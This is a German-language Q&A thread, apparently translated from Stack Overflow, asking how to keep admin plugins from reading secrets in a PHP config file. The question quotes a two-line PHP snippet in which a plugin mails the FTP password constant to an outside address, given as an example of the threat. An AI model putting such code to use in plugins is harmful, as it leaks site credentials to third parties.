2016-06-17 11 views
0

Ich schreibe eine Anwendung, die die Verwendung von Plugins unterstützt, die an den Admin angehängt werden können.Wie verhindert man, dass Plugins auf Konfigurationsdateien zugreifen

Wie kann ich die Config-Dateien schützen, weil zur Zeit, wenn ein Plugin-Entwickler schreibt:

$msg=__FTP_PASS__; 

mail("[email protected]","subject",$msg); 

Die Nachricht zusammen mit dem Kennwort gesendete. Wie verhindere ich das, weil dies passiert, weil ich "config.php" oben auf der Admin-Seite eingefügt habe. Vielen Dank. #am Entschuldigung, ich weiß nicht, wie man Frage auf Stackoverf formatieren

Antwort

0

Sie können dies mit einer Art PHP-Sandbox verhindern (Runkit Runkit_Sandbox Klasse kommt in den Sinn), aber es ist kein Standard-Teil von PHP und es richtig verwenden wird nicht trivial sein.

Es ist niemals eine gute Idee, Benutzern das Ausführen von willkürlichem Code zu erlauben.

+0

Danke ich werde durch das Tutorial gehen – seybanks

Verwandte Themen